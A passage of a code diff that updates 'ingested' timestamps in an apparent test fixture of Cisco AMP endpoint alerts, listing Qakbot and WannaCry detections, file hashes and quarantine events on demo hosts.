Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", "code": "1090519054", "kind": "alert", @@ -772,7 +772,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388904Z", + "ingested": "2021-12-14T14:41:01.444860767Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648147", "kind": "alert", @@ -852,7 +852,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388909700Z", + "ingested": "2021-12-14T14:41:01.444861312Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648147", "kind": "alert", @@ -933,7 +933,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:55.388915800Z", + "ingested": "2021-12-14T14:41:01.444862055Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", "code": "1107296274", "kind": "alert", @@ -1014,7 +1014,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388921600Z", + "ingested": "2021-12-14T14:41:01.444862550Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "1107296278", "kind": "alert", @@ -1078,7 +1078,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:55.388927300Z", + "ingested": "2021-12-14T14:41:01.444862944Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", @@ -1152,7 +1152,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:55.388933100Z", + "ingested": "2021-12-14T14:41:01.444863484Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "code": "553648173", "kind": "alert", @@ -1249,7 +1249,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388938800Z", + "ingested": "2021-12-14T14:41:01.444863943Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", "code": "1090519054", "kind": "alert", @@ -1327,7 +1327,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388944600Z", + "ingested": "2021-12-14T14:41:01.444864448Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", "code": "553648143", "kind": "alert", @@ -1399,7 +1399,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388950400Z", + "ingested": "2021-12-14T14:41:01.444864923Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -1496,7 +1496,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388956100Z", + "ingested": "2021-12-14T14:41:01.444865460Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", @@ -1599,7 +1599,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388960200Z", + "ingested": "2021-12-14T14:41:01.444865850Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", @@ -1677,7 +1677,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388964700Z", + "ingested": "2021-12-14T14:41:01.444866298Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -1741,7 +1741,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:55.388969800Z", + "ingested": "2021-12-14T14:41:01.444866740Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", @@ -1810,7 +1810,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388974600Z", + "ingested": "2021-12-14T14:41:01.444867143Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1107296272", "kind": "alert", @@ -1892,7 +1892,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388994900Z", + "ingested": "2021-12-14T14:41:01.444867732Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1107296258", "kind": "alert", @@ -1969,7 +1969,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.388998300Z", + "ingested": "2021-12-14T14:41:01.444868211Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", "code": "553648155", "kind": "alert", @@ -2051,7 +2051,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.389051900Z", + "ingested": "2021-12-14T14:41:01.444868603Z", "original": 